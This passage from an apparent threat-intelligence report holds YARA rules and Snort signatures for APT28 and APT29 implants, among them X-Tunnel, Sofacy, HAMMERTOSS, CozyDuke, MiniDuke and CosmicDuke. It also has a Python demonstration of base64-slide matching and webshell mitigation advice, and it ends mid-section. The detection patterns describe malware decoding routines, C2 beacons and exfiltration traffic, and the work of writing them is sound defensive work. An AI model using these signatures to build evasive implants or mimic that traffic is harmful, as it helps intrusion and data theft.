$key84 = { 83694CCA50B821144FFBBE6855F62845F1328111AE1AC5666CBA59EB43AA12C6 }
$key85 = { 145E906416B17865AD37CD022DF5481F28C930D6E3F53C50B0953BF33F4DB953 }
$key86 = { AB49B7C2FA3027A767F5AA94EAF2B312BBE3E89FD924EF89B92A7CF977354C22 }
$key87 = { 7E04E478340C209B01CA2FEBBCE3FE77C6E6169F0B0528C42FA4BDA6D90AC957 }
$key88 = { 0EADD042B9F0DDBABA0CA676EFA4EDB68A045595097E5A392217DFFC21A8532F }
$key89 = { 5623710F134ECACD5B70434A1431009E3556343ED48E77F6A557F2C7FF46F655 }
$key90 = { 6968657DB62F4A119F8E5CB3BF5C51F4B285328613AA7DB9016F8000B576561F }

$key91 = { DEBB9C95EAE6A68974023C335F8D2711135A98260415DF05845F053AD65B59B4 } 
$key92 = { 16F54900DBF08950F2C5835153AB636605FB8C09106C0E94CB13CEA16F275685 } 

$key93 = { 1C9F86F88F0F4882D5CBD32876368E7B311A84418692D652A6A4F315CC499AE8 } 
$key94 = { E920E0783028FA05F4CE2D6A04BBE636D56A775CFD4DAEA3F2A1B8BEEB52A6D4 } 
$key95 = { 73874CA3AF47A8A315D50E1990F44F655EC7C15B146FFE0611B6C4FC096BD07C } 
$key96 = { F21C1FA163C745789C53922C47E191A5A85301BDC2FFC3D3B688CFBFF39F3BE5 } 
$key97 = { BC5A861F21CB98BD1E2AE9650B7A0BB4CD0C71900B3463C1BC3380AFD2BB948E } 
$key98 = { 151BAE36E646F30570DC6A7B57752F2481A0B48DD5184E914BCF411D8AD5ACA0 }
$key99 = { F05AD6D7A0CADC10A6468BFDBCBB223D5BD6CA30EE19C239E8035772D80312C9 } 
$key100 = { 5DE9A0FDB37C0D59C298577E5379BCAF4F86DF3E9FA17787A4CEFA7DD10C462E }

$key101 = { F5E62BA862380224D159A324D25FD321E5B35F8554D70CF9A506767713BCA508 }
$key102 = { A2D1B10409B328DA0CCBFFDE2AD2FF10855F95DA36A1D3DBA84952BB05F8C3A7 }
$key103 = { C974ABD227D3AD339FAC11C97E11D904706EDEA610B181B8FAD473FFCC36A695 }
$key104 = { AB5167D2241406C3C0178D3F28664398D5213EE5D2C09DCC9410CB604671F5F1 }
$key105 = { C25CC4E671CAAA31E137700A9DB3A272D4E157A6A1F47235043D954BAE8A3C70 }
$key106 = { E6005757CA0189AC38F9B6D5AD584881399F28DA949A0F98D8A4E3862E20F715 }
$key107 = { 204E6CEB4FF59787EF4D5C9CA5A41DDF4445B9D8E0C970B86D543E9C7435B194 }
$key108 = { 831D7FD21316590263B69E095ABBE89E01A176E16AE799D83BD774AF0D254390 }
$key109 = { 42C36355D9BC573D72F546CDB12E6BB2CFE2933AC92C12040386B310ABF6A1ED }
$key110 = { B9044393C09AD03390160041446BF3134D864D16B25F1AB5E5CDC690C4677E7D }
$key111 = { 6BC1102B5BE05EEBF65E2C3ACA1F4E17A59B2E57FB480DE016D371DA3AEF57A5 }

$key112 = { B068D00B482FF73F8D23795743C76FE8639D405EE54D3EFB20AFD55A9E2DFF4E }
$key113 = { 95CF5ADDFE511C8C7496E3B75D52A0C0EFE01ED52D5DD04D0CA6A7ABD3A6F968 }
$key114 = { 75534574A4620019F8E3D055367016255034FA7D91CBCA9E717149441742AC8D }

$key115 = { 96F1013A5301534BE424A11A94B740E5EB3A627D052D1B769E64BAB6A666433C }
$key116 = { 584477AB45CAF729EE9844834F84683ABECAB7C4F7D23A9636F54CDD5B8F19B3 }

$key117 = { D3905F185B564149EE85CC3D093477C8FF2F8CF601C68C38BBD81517672ECA3A }
$key118 = { BF29521A7F94636D1930AA236422EB6351775A523DE68AF9BF9F1026CEDA618D }
$key119 = { 04B3A783470AF1613A9B849FBD6F020EE65C612343EB1C028B2C28590789E60B }
$key120 = { 3D8D8E84977FE5D21B6971D8D873E7BED048E21333FE15BE2B3D1732C7FD3D04 }

$key121 = { 8ACB88224B6EF466D7653EB0D8256EA86D50BBA14FD05F7A0E77ACD574E9D9FF }
$key122 = { B46121FFCF1565A77AA45752C9C5FB3716B6D8658737DF95AE8B6A2374432228 }
$key123 = { A4432874588D1BD2317224FB371F324DD60AB25D4191F2F01C5C13909F35B943 }
$key124 = { 78E1B7D06ED2A2A044C69B7CE6CDC9BCD77C19180D0B082A671BBA06507349C8 }
$key125 = { 540198C3D33A631801FE94E7CB5DA3A2D9BCBAE7C7C3112EDECB342F3F7DF793 }
$key126 = { 7E905652CAB96ACBB7FEB2825B55243511DF1CD8A22D0680F83AAF37B8A7CB36 }
$key127 = { 37218801DBF2CD92F07F154CD53981E6189DBFBACAC53BC200EAFAB891C5EEC8 }
condition: 
any of them 

} 


rule IMPLANT_5_v3
{
strings:
// imul eax, eax ; imul eax, eax, 7 ; sub eax, 1 ; imul ... ; cmp [...], reg
$BYTES1 = { 0F AF C0 6? C0 07 00 00 00 2D 01 00 00 00 0F AF ?? 39 ?8 }
$BYTES2 = { 0F AF C0 6? C0 07 48 0F AF ?? 39 ?8 }
condition:
any of them
}


rule IMPLANT_5_v4
{
strings:
$FBKEY1 = { 987AB999FE0924A2DF0A412B14E26093746FCDF9BA31DC05536892C33B116AD3 }
$FBKEY2 = { 8B236C892D902B0C9A6D37AE4F9842C3070FBDC14099C6930158563C6AC00FF5 }
$FBKEY3 = { E47B7F110CAA1DA617545567EC972AF3A6E7B4E6807B7981D3CFBD3D8FCC3373 }
$FBKEY4 = { 48B284545CA1FA74F64FDBE2E605D68CED8A726D05EBEFD9BAAC164A7949BDC1 }
$FBKEY5 = { FB421558E30FCCD95FA7BC45AC92D2991C44072230F6FBEAA211341B5BF2DC56 }
condition:
all of them
}

Network Indicators for Implant 5

The first signature fires on the first four client bytes of an established session to an HTTP port or 44300: byte 0 below 0x60, bytes 1 through 3 all zero, and no "HTTP" anywhere in the payload (which excludes a normal request line). The second matches the 4-byte upstream marker |02 00 00 10| at the head of a 20-byte client stream on 443.

alert tcp any any -> any [$HTTP_PORTS,44300] (msg:"X_Tunnel_HTTP_CONNECT_HANDSHAKE"; flow:established,to_server; dsize:4; content:"|00 00 00|"; offset:1; depth:3; byte_test:1,<,96,0; content:!"HTTP";)

alert tcp any any -> any 443 (msg:"X_Tunnel_UPSTREAM_CONNECTION_EVENT"; flow:established,to_server; stream_size:either,=,20; content:"|02 00 00 10|"; depth:4;)


The following YARA rules detect Sofacy, Sednit, and EVILTOSS, referred to as IMPLANT 6 in the rule naming convention. Every rule's condition first gates on a file header so the byte patterns are only evaluated against plausible carriers: MZ (PE, uint16(0) == 0x5A4D), the OLE2 compound-document signature D0 CF (0xCFD0), the libpcap capture magic D4 C3 (0xC3D4), "%PDF" (uint32(0) == 0x46445025), and RTF ("{\rtf", whose bytes "\rtf" at offset 1 are uint32(1) == 0x6674725C).

IMPLANT 6 Rules: 


rule IMPLANT_6_v1
{
strings:
$STR1 = "dll.dll" wide ascii
$STR2 = "Init1" wide ascii
$STR3 = "netui.dll" wide ascii
condition:
// PE (MZ), OLE2 (D0 CF), libpcap (D4 C3), PDF (%PDF) or RTF ({\rtf) header, then all three strings
(uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and all of them
}


TLP:WHITE


rule IMPLANT_6_v2
{
strings:
$obf_func = { 8B 45 F8 6A 07 03 C7 33 D2 89 45 E8 8D 47 01 5B 02 4D 0F F7 F3 6A 07 8A 04 32 33 D2 F6 E9 8A C8 8B C7 F7 F3 8A 44 3E FE 02 45 FC 02 0C 32 B2 03 F6 EA 8A D8 8D 47 FF 33 D2 5F F7 F7 02 5D 14 8B 45 E8 8B 7D F4 C0 E3 06 02 1C 32 32 CB 30 08 8B 4D 14 41 47 83 FF 09 89 4D 14 89 7D F4 72 A1 }
condition:
(uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and all of them
}


rule IMPLANT_6_v3
{
strings:
$deob_func = { 8D 46 01 02 D1 83 E0 07 8A 04 38 F6 EA 8B D6 83 E2 07 0A 04 3A 33 D2 8A 54 37 FE 03 D3 03 D1 D3 EA 32 C2 8D 56 FF 83 E2 07 8A 1C 3A 8A 14 2E 32 C3 32 D0 41 88 14 2E 46 83 FE 0A 7C ?? }
condition:
(uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and all of them
}


rule IMPLANT_6_v4
{
strings:
// push ebx ; push reg ; push reg ; ... call reg ; mov reg, ... ; mov reg, 0x186A0 (100000) ; ... call reg ; ... ret
$ASM = { 53 5? 5? [6-15] ff d? 8b ?? b? a0 86 01 00 [7-13] ff d? ?b [6-10] c0 [0-1] c3 }
condition:
(uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and all of them
}


rule IMPLANT_6_v5
{
strings:
$STR1 = { 83 EC 18 8B 4C 24 24 B8 AB AA AA AA F7 E1 8B 44 24 20 53 55 8B EA 8D 14 08
B8 AB AA AA AA 89 54 24 1C F7 E2 56 8B F2 C1 ED 02 8B DD 57 8B 7C 24 38 89 6C 24 1C C1 EE
02 3B DE 89 5C 24 18 89 74 24 20 0F 83 CF 00 00 00 8D 14 5B 8D 44 12 FE 89 44 24 10 3B DD 0F 85
CF 00 00 00 8B C1 33 D2 B9 06 00 00 00 F7 F1 8B CA 83 F9 06 89 4C 24 38 0F 83 86 00 00 00 8A C3
B2 06 F6 EA 8B 54 24 10 88 44 24 30 8B 44 24 2C 8D 71 02 03 D0 89 54 24 14 8B 54 24 10 33 C0 8A
44 37 FE 03 D6 8B D8 8D 46 FF 0F AF DA 33 D2 BD 06 00 00 00 F7 F5 C1 EB 07 8A 04 3A 33 D2 32
D8 8D 46 01 F7 F5 8A 44 24 30 02 C1 8A 0C 3A 33 D2 32 C8 8B C6 F7 F5 8A 04 3A 22 C8 8B 44 24
14 02 D9 8A 0C 30 32 CB 88 0C 30 8B 4C 24 38 41 46 83 FE 08 89 4C 24 38 72 A1 8B 5C 24 18 8B 6C
24 1C 8B 74 24 20 8B 4C 24 10 43 83 C1 06 3B DE 89 4C 24 10 8B 4C 24 34 89 5C 24 18 0F 82 3C FF
FF FF 3B DD 75 1A 8B C1 33 D2 B9 06 00 00 00 F7 F1 8B CA EB 0D 33 C9 89 4C 24 38 E9 40 FF FF
FF 33 C9 8B 44 24 24 33 D2 BE 06 00 00 00 89 4C 24 38 F7 F6 3B CA 89 54 24 24 0F 83 95 00 00 00
8A C3 B2 06 F6 EA 8D 1C 5B 88 44 24 30 8B 44 24 2C 8D 71 02 D1 E3 89 5C 24 34 8D 54 03 FE 89
54 24 14 EB 04 8B 5C 24 34 33 C0 BD 06 00 00 00 8A 44 3E FE 8B D0 8D 44 1E FE 0F AF D0 C1 EA
07 89 54 24 2C 8D 46 FF 33 D2 BB 06 00 00 00 F7 F3 8B 5C 24 2C 8A 04 3A 33 D2 32 D8 8D 46 01
F7 F5 8A 44 24 30 02 C1 8A 0C 3A 33 D2 32 C8 8B C6 F7 F5 8A 04 3A 22 C8 8B 44 24 14 02 D9 8A
0C 06 32 CB 88 0C 06 8B 4C 24 38 8B 44 24 24 41 46 3B C8 89 4C 24 38 72 8F 5F 5E 5D 5B 83 C4 18
C2 10 00 }
condition:
(uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and all of them
}


rule IMPLANT_6_v6
{
strings:
// push 2710h ; call [imp] ; mov eax, [addr] ; push -1 ; push eax ; call [imp] ; xor eax, eax ; ret
$Init1_fun = { 68 10 27 00 00 FF 15 ?? ?? ?? ?? A1 ?? ?? ?? ?? 6A FF 50 FF 15 ?? ?? ?? ?? 33 C0 C3 }
condition:
(uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and all of them
}


rule IMPLANT_6_v7
{
strings:
$STR1 = "Init1"
$OPT1 = "ServiceMain"
$OPT2 = "netids" nocase wide ascii
$OPT3 = "netui" nocase wide ascii
$OPT4 = "svchost.exe" wide ascii
$OPT5 = "network" nocase wide ascii
condition:
(uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and $STR1 and 2 of ($OPT*)
}
APPENDIX B: APT29

This section details six implants associated with APT29 actors (IMPLANT 7 through IMPLANT 12). Included are YARA rules as well as Snort signatures. Please note that despite being sound production rules, there is still the chance of false positives. In addition, these rules complement additional analysis and should not be used as the sole source of attribution. The sid values in the Snort signatures are placeholders (several reuse sid:1234 and some carry none): assign each rule a unique local SID (1000000 or higher) and a rev before loading it, because Snort identifies rules by their GID:SID pair.

The following YARA rules detect IMPLANT 7, with rule naming convention.

IMPLANT 7 Rules:

rule IMPLANT_7_v1
{
strings:
$MZ = "MZ"
// byte-wise XOR loop: mov al, [edx+ecx+3] ; xor al, bl ; movzx eax, al ; mov [esi+ecx*2], ax ; inc ecx ; cmp ecx, edi ; jb
$STR1 = { 8A 44 0A 03 32 C3 0F B6 C0 66 89 04 4E 41 3B CF 72 EE }
// 16-byte SSE XOR loop: movdqu xmm0, [eax+ecx] ; pxor xmm0, xmm1 ; movdqu [ecx+edx], xmm0 ; add ecx, 10h ; cmp ecx, edi ; jb
$STR2 = { F3 0F 6F 04 08 66 0F EF C1 F3 0F 7F 04 11 83 C1 10 3B CF 72 EB }
condition:
$MZ at 0 and ($STR1 or $STR2)
}

Network Indicators for Implant 7

The three signatures differ only in the number of query-string arguments they expect (two, three, or four); the "captha" spelling in the path alternation is as published. Each argument name is drawn from the same fixed list and each value is up to 26 lower-case alphanumerics.

alert tcp any any -> any 80 (content:".php?"; pcre:"/\/(?:index|status|captha|json|css|ajax|js)\.php\?(?:id|item|mode|page|status|s|f|t|k|l|m|n|b|v|c|app|js|css|im|code|search)=[a-z0-9]{0,26}\&(?:id|item|mode|page|status|s|f|t|k|l|m|n|b|v|c|app|js|css|im|code|search)=[a-z0-9]{0,26} HTTP/"; msg:"Cache_DLL beacon GET 2 arg"; sid:1234;)

alert tcp any any -> any 80 (content:".php?"; pcre:"/\/(?:index|status|captha|json|css|ajax|js)\.php\?(?:id|item|mode|page|status|s|f|t|k|l|m|n|b|v|c|app|js|css|im|code|search)=[a-z0-9]{0,26}\&(?:id|item|mode|page|status|s|f|t|k|l|m|n|b|v|c|app|js|css|im|code|search)=[a-z0-9]{0,26}\&(?:id|item|mode|page|status|s|f|t|k|l|m|n|b|v|c|app|js|css|im|code|search)=[a-z0-9]{0,26} HTTP/"; msg:"Cache_DLL beacon GET 3 arg"; sid:1234;)

alert tcp any any -> any 80 (content:".php?"; pcre:"/\/(?:index|status|captha|json|css|ajax|js)\.php\?(?:id|item|mode|page|status|s|f|t|k|l|m|n|b|v|c|app|js|css|im|code|search)=[a-z0-9]{0,26}\&(?:id|item|mode|page|status|s|f|t|k|l|m|n|b|v|c|app|js|css|im|code|search)=[a-z0-9]{0,26}\&(?:id|item|mode|page|status|s|f|t|k|l|m|n|b|v|c|app|js|css|im|code|search)=[a-z0-9]{0,26}\&(?:id|item|mode|page|status|s|f|t|k|l|m|n|b|v|c|app|js|css|im|code|search)=[a-z0-9]{0,26} HTTP/"; msg:"Cache_DLL beacon GET 4 arg"; sid:1234;)


The following YARA rules detect HAMMERTOSS / HammerDuke, referred to as IMPLANT 8 in the rule naming convention. The implant is a .NET binary that fabricates a Google search referer; the first rule keys on the hard-coded referer parameters, the second on a CIL XOR-decoding sequence.


IMPLANT 8 Rules: 


rule IMPLANT_8_v1
{
strings:
$DOTNET = "mscorlib" ascii
$REF_URL = "https://www.google.com/url?sa=" wide
$REF_var_1 = "&rct=" wide
$REF_var_2 = "&q=&esrc=" wide
$REF_var_3 = "&source=" wide
$REF_var_4 = "&cd=" wide
$REF_var_5 = "&ved=" wide
$REF_var_6 = "&url=" wide
$REF_var_7 = "&ei=" wide
$REF_var_8 = "&usg=" wide
$REF_var_9 = "&bvm=" wide
$REF_value_1 = "QFj" wide
$REF_value_2 = "bv.81" wide
condition:
(uint16(0) == 0x5A4D) and ($DOTNET) and ($REF_URL) and (3 of ($REF_var*)) and (1 of ($REF_value*))
}


rule IMPLANT_8_v2
{
strings:
$DOTNET = "mscorlib" ascii
// CIL: xor ; ldc.i4 0xAA ; xor
$XOR = { 61 20 AA 00 00 00 61 }
condition:
(uint16(0) == 0x5A4D) and all of them
}

Network Indicators for Implant 8

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"MAL_REFERER"; flow:established,to_server; content:"GET"; http_method; content:"&bvm=bv.81"; fast_pattern; http_header; content:",d."; distance:6; within:3; http_header; content:"|0D 0A|"; distance:3; within:2; http_header; content:!"Cookie|3A 20|"; http_header; pcre:"/https:\/\/www\.google\.com\/url\?sa=t&rct=j&q=&esrc=s&source=web&cd=(?:[0-9]|10|11)&ved=0C[A-L]{2}QFjA[A-L]&url=[^&]{1,512}&ei=[A-Za-z0-9]{20,22}&usg=[A-Za-z0-9]{34}&bvm=bv\.81[1-7]{6}\,d\.[A-Za-z0-9]{3}\x0d\x0a/D"; sid:1234; rev:2;)

alert tcp any any -> any any (msg:"evil_twitter_callback"; content:"GET /api/asyncTwitter.php HTTP/1.1";)
The following YARA rules detect OnionDuke, referred to as IMPLANT 9 in the rule naming convention.

IMPLANT 9 Rules:

rule IMPLANT_9_v1
{
strings:
$STR1 = { 8B 03 8A 54 01 03 32 55 FF 41 88 54 39 FF 3B CE 72 EE }
$STR2 = { 8B C8 83 E1 03 8A 54 19 08 8B 4D 08 32 54 01 04 40 88 54 38 FF 3B C6 72 E7 }
$STR3 = { 8B 55 F8 8B C8 83 E1 03 8A 4C 11 08 8B 55 FC 32 0C 10 8B 17 88 4C 02 04 40 3B 06 72 E3 }
condition:
// As published. The bare uint16(0) term is true for any file whose first two bytes are
// non-zero, so the header check adds nothing and the rule effectively reduces to "all of them".
(uint16(0) == 0x5A4D or uint16(0)) and all of them
}

The following YARA rules detect CozyDuke, CozyCar, CozyBear, referred to as IMPLANT 10 in the rule naming convention.

IMPLANT 10 Rules:

rule IMPLANT_10_v1
{
strings:
$MZ = "MZ"
$STR1 = { 33 ?? 83 f2 ?? 81 e2 ff 00 00 00 }
$STR2 = { 0f be 14 01 33 d0 ?? f2 [1-4] 81 e2 ff 00 00 00 66 89 [6] 40 83 f8 ?? 72 }
condition:
$MZ at 0 and ($STR1 or $STR2)
}

rule IMPLANT_10_v2
{
strings:
$MZ = "MZ"
// x64: xor al, imm8 ; xor ax, cx ; inc rcx
$xor = { 34 ?? 66 33 C1 48 FF C1 }
// 14-byte multi-prefix nop used for alignment
$nop = { 66 66 66 66 66 66 0F 1F 84 00 00 00 00 00 }
condition:
$MZ at 0 and $xor and $nop
}

Network Indicators for IMPLANT 10

alert tcp any any -> any 80 (content:"=650&"; pcre:"/=11&[^&]{1,7}?=2[^&]{6,12}&[^&]{1,7}?=410&[^&]{1,7}?=650&[^&]{1,7}?=51 HTTP\/1\.1/"; msg:"CozyCar"; sid:1;)

alert tcp any any -> any 80 (content:".php? HTTP"; content:"=12&"; distance:0; pcre:"/=12&[^&=]{1,7}?=2[^&=]{12,16}?==[^&=]{18,26}?==/"; msg:"CozyCarv2"; sid:1234;)


The following YARA rules detect MiniDuke, referred to as IMPLANT 11 with rule naming convention. 


IMPLANT 11 Rules: 


rule IMPLANT_11_v1
{
strings:
// "Virt" "ualP" "rote" "ct": VirtualProtect assembled from 4-byte immediates; $STR8 requires them in order
$STR1 = { 63 74 00 00 } // ct
$STR2 = { 72 6F 74 65 } // rote
$STR3 = { 75 61 6C 50 } // ualP
$STR4 = { 56 69 72 74 } // Virt
$STR5 = { E8 00 00 00 00 } // call $+5, the position-independent get-EIP idiom (required at least 5 times)
$STR6 = { 64 FF 35 00 00 00 00 } // push dword ptr fs:[0] (SEH frame setup)
$STR7 = { D2 C0 } // rol al, cl
$STR8 = /\x63\x74\x00\x00.{3,20}\x72\x6F\x74\x65.{3,20}\x75\x61\x6C\x50.{3,20}\x56\x69\x72\x74/
condition:
(uint16(0) == 0x5A4D) and #STR5 > 4 and all of them
}

Network Indicators for IMPLANT 11

These twelve signatures match two fixed strings (string1 and string2) inside a base64-encoded SMTP body. Base64 encodes 3-byte groups, so each string has three different encodings depending on where it falls relative to a group boundary; the three "slide" groups cover those alignments. Within each slide, the "_1" rule anchors its content match on the leading characters and the "_2" rule on the trailing characters, and the lazy-optional (\x0d\x0a)?? between every character of the pcre tolerates a MIME line fold at any position, so one rule of each pair still fires wherever the 76-column wrap lands.

alert tcp any any -> any 25 (msg:"MiniDuke-string1_slide_1_1 - new"; content:"IUgyYll"; pcre:"/IUgyYll(\x0d\x0a)??t(\x0d\x0a)??L(\x0d\x0a)??l(\x0d\x0a)??N(\x0d\x0a)??3(\x0d\x0a)??Q/";)

alert tcp any any -> any 25 (msg:"MiniDuke-string1_slide_1_2 - new"; content:"ltLlN3Q"; pcre:"/I(\x0d\x0a)??U(\x0d\x0a)??g(\x0d\x0a)??y(\x0d\x0a)??Y(\x0d\x0a)??l(\x0d\x0a)??ltLlN3Q/";)

alert tcp any any -> any 25 (msg:"MiniDuke-string1_slide_2_1 - new"; content:"FIMmJZ"; pcre:"/FIMmJZ(\x0d\x0a)??b(\x0d\x0a)??S(\x0d\x0a)??5(\x0d\x0a)??T(\x0d\x0a)??d(\x0d\x0a)??0/";)

alert tcp any any -> any 25 (msg:"MiniDuke-string1_slide_2_2 - new"; content:"bS5Td0"; pcre:"/F(\x0d\x0a)??I(\x0d\x0a)??M(\x0d\x0a)??m(\x0d\x0a)??J(\x0d\x0a)??Z(\x0d\x0a)??bS5Td0/";)

alert tcp any any -> any 25 (msg:"MiniDuke-string1_slide_3_1 - new"; content:"hSDJiWW"; pcre:"/hSDJiWW(\x0d\x0a)??0(\x0d\x0a)??u(\x0d\x0a)??U(\x0d\x0a)??3(\x0d\x0a)??d(\x0d\x0a)??A/";)

alert tcp any any -> any 25 (msg:"MiniDuke-string1_slide_3_2 - new"; content:"W0uU3dA"; pcre:"/h(\x0d\x0a)??S(\x0d\x0a)??D(\x0d\x0a)??J(\x0d\x0a)??i(\x0d\x0a)??W(\x0d\x0a)??W0uU3dA/";)

alert tcp any any -> any 25 (msg:"MiniDuke-string2_slide_1_1 - new"; content:"QDM0Zlo"; pcre:"/QDM0Zlo(\x0d\x0a)??3(\x0d\x0a)??R(\x0d\x0a)??V(\x0d\x0a)??t(\x0d\x0a)??w(\x0d\x0a)??X/";)

alert tcp any any -> any 25 (msg:"MiniDuke-string2_slide_1_2 - new"; content:"o3RVtwX"; pcre:"/Q(\x0d\x0a)??D(\x0d\x0a)??M(\x0d\x0a)??0(\x0d\x0a)??Z(\x0d\x0a)??l(\x0d\x0a)??o3RVtwX/";)

alert tcp any any -> any 25 (msg:"MiniDuke-string2_slide_2_1 - new"; content:"AzNGZa"; pcre:"/AzNGZa(\x0d\x0a)??N(\x0d\x0a)??0(\x0d\x0a)??V(\x0d\x0a)??b(\x0d\x0a)??c(\x0d\x0a)??F/";)

alert tcp any any -> any 25 (msg:"MiniDuke-string2_slide_2_2 - new"; content:"N0VbcF"; pcre:"/A(\x0d\x0a)??z(\x0d\x0a)??N(\x0d\x0a)??G(\x0d\x0a)??Z(\x0d\x0a)??a(\x0d\x0a)??N0VbcF/";)

alert tcp any any -> any 25 (msg:"MiniDuke-string2_slide_3_1 - new"; content:"AMzRmWj"; pcre:"/AMzRmWj(\x0d\x0a)??d(\x0d\x0a)??F(\x0d\x0a)??W(\x0d\x0a)??3(\x0d\x0a)??B(\x0d\x0a)??c/";)

alert tcp any any -> any 25 (msg:"MiniDuke-string2_slide_3_2 - new"; content:"jdFW3Bc"; pcre:"/A(\x0d\x0a)??M(\x0d\x0a)??z(\x0d\x0a)??R(\x0d\x0a)??m(\x0d\x0a)??W(\x0d\x0a)??jdFW3Bc/";)
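Why the signatures above come in slide pairs, shown as an added example that is not part of the original report: the script regenerates the three alignment-independent base64 fragments of a marker and matches them with the same lazy-optional CRLF construct the pcre options use. The marker bytes are obtained here by decoding the string1 fragments in the signatures; the SMTP body it scans is constructed for the demonstration, wrapped at eight columns so that the line fold lands inside the fragment.

```python
import base64
import re

# Constructed from the string1 fragments above: decoding "IUgyYlltLlN3Q" at
# alignment 0 yields these bytes. Not taken from any malware sample.
MARKER1 = b"!H2bYm.Sw@"


def base64_slides(marker):
    """Return the three base64 'slides' of marker.

    Base64 works on 3-byte groups, so the same bytes encode to a different
    string depending on their offset modulo 3 in the plaintext. Encoding the
    marker behind 0, 1 and 2 bytes of filler and dropping every output
    character that carries filler or padding bits leaves the fragments a
    content match has to look for, whatever precedes the marker.
    """
    slides = []
    for k in range(3):
        enc = base64.b64encode(b"\x00" * k + marker).decode("ascii")
        lead = (0, 2, 3)[k]                       # chars holding filler bits
        tail = (0, 3, 2)[(k + len(marker)) % 3]   # chars holding padding bits or '='
        slides.append(enc[lead:len(enc) - tail])
    return slides


def fold_tolerant_pattern(fragment):
    """Regex matching fragment even if a CRLF falls anywhere inside it.

    MIME base64 bodies are wrapped at 76 columns; (?:\\r\\n)?? is a lazy
    optional, the construct the Snort pcre options use between characters.
    """
    return re.compile(r"(?:\r\n)??".join(re.escape(c) for c in fragment))


def scan_body(body, marker):
    """Index (0, 1 or 2) of the first slide found in body, or None."""
    text = body.decode("ascii", errors="replace")
    for i, fragment in enumerate(base64_slides(marker)):
        if fold_tolerant_pattern(fragment).search(text):
            return i
    return None


def wrap_lines(encoded, width=76):
    """Fold a base64 string the way a MIME encoder does (CRLF line ends)."""
    return "\r\n".join(encoded[i:i + width] for i in range(0, len(encoded), width))


# Constructed sample: one filler byte puts the marker at alignment 1, and the
# eight-column wrap splits the fragment across a line break.
SAMPLE_BODY = wrap_lines(base64.b64encode(b"Z" + MARKER1).decode("ascii"), width=8).encode("ascii")

if __name__ == "__main__":
    print(base64_slides(MARKER1))
    print(SAMPLE_BODY, "->", scan_body(SAMPLE_BODY, MARKER1))
```

A plain substring check for the alignment-1 fragment fails on the folded body, while the fold-tolerant pattern still finds it; that is exactly the gap the "_1"/"_2" rule pairs close on a sensor that cannot reassemble and base64-decode the message.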


The following YARA rules detect CosmicDuke, referred to as IMPLANT 12 in the rule naming convention.

IMPLANT 12 Rules:

rule IMPLANT_12_v1
{
strings:
// mov eax, [__security_cookie] ; xor eax, ebp ; mov [ebp-x], eax ; push esi ; push edi ; ... ; fs: prefix
// This is the standard MSVC /GS + SEH function prologue and is present in many benign binaries,
// so expect false positives; corroborate hits with the network indicators below.
$FUNC = { A1 [3-5] 33 C5 89 [2-3] 56 57 83 [4-6] 64 }
condition:
(uint16(0) == 0x5A4D) and $FUNC
}

Network Indicators for IMPLANT 12

alert tcp any any -> any 80 (msg:"CosmicDuke HTTP Beacon"; content:"&BranchID="; pcre:"/\?(?:m|mgn)\&Auth\=[a-zA-Z0-9]{8}\&Session\=/";)

alert tcp any any -> any 80 (msg:"CosmicDuke Webdav Exfil"; content:"PUT /catalog/outgoing/wd"; pcre:"/PUT \/catalog\/outgoing\/wd[a-zA-Z0-9]{44}\.bin/";)

alert tcp any any -> any 21 (msg:"CosmicDuke FTP Exfil"; content:"STOR fp"; pcre:"/STOR fp[a-zA-Z0-9]{44}\.bin/";)
APPENDIX C: Mitigations Guidance

Defending Against Webshell Attacks

Defend 

• Continually patch all webservers and all web components servicing the site, including PHP, 
Apache, IIS, and ColdFusion. Deploying a webshell typically requires adding to, or 
modifying, the code presented by the web server and is often accomplished via an exploit of 
a web server vulnerability. Patching all components that service the web server provides a 
substantial mitigation against most commonly known vulnerabilities. 

• Adhere to least privilege principles for server access and management. Through following 
the principle of least privilege, lateral movement and privilege escalation is made more 
challenging to an attacker by restricting access on the box and across the network. 

• Restrict write access to all folders that contain files served by the web server. All content 
served by the web server should be tightly controlled in such a way that only web 
administrator accounts can modify or add content. This would force an attacker to gain 
specific sets of credentials before they could add any malicious content to be delivered by the 
server. 

• Restrict access to all ports and administrative panels. Server ports are typically very 
predictable, and access to those ports should be constrained to only the services and users 
that require them. This will reduce the attack surface on the web server and supporting 
applications. 

• Deploy and configure Security-Enhanced Linux (SELinux) on Linux systems that support it. SELinux can confine web services such as Apache to specific directories, for example /var/www/html, which holds the pages actually being served. If a site accepts uploads, SELinux can enforce least privilege on the upload directories as well by restricting read/write access to them. The web service already runs in a low-privilege context, but SELinux additionally limits the file locations it can reach, which prevents arbitrary file writes and malware uploads into locations an administrator would not normally inspect.

• Conduct regular vulnerability scans and establish a remediation strategy focusing on the most 
detrimental findings first. Regular scanning and remediation measures will remove 
opportunities to exploit known attack vectors by an adversary. 

• Deploy a Web Application Firewall (WAF). WAF technologies defend against common web 
exploitation techniques such as SQL injection and cross site scripting. Deploying this 
capability helps reduce the likelihood of a successful web attack on the server that could 
otherwise allow the perpetrator to modify code and deploy the webshell. 
• Where third-party products are integrated into the website (e.g., Adobe ColdFusion), ensure that the product is configured according to DoD or vendor-published hardening best practices.[1]

Detect 

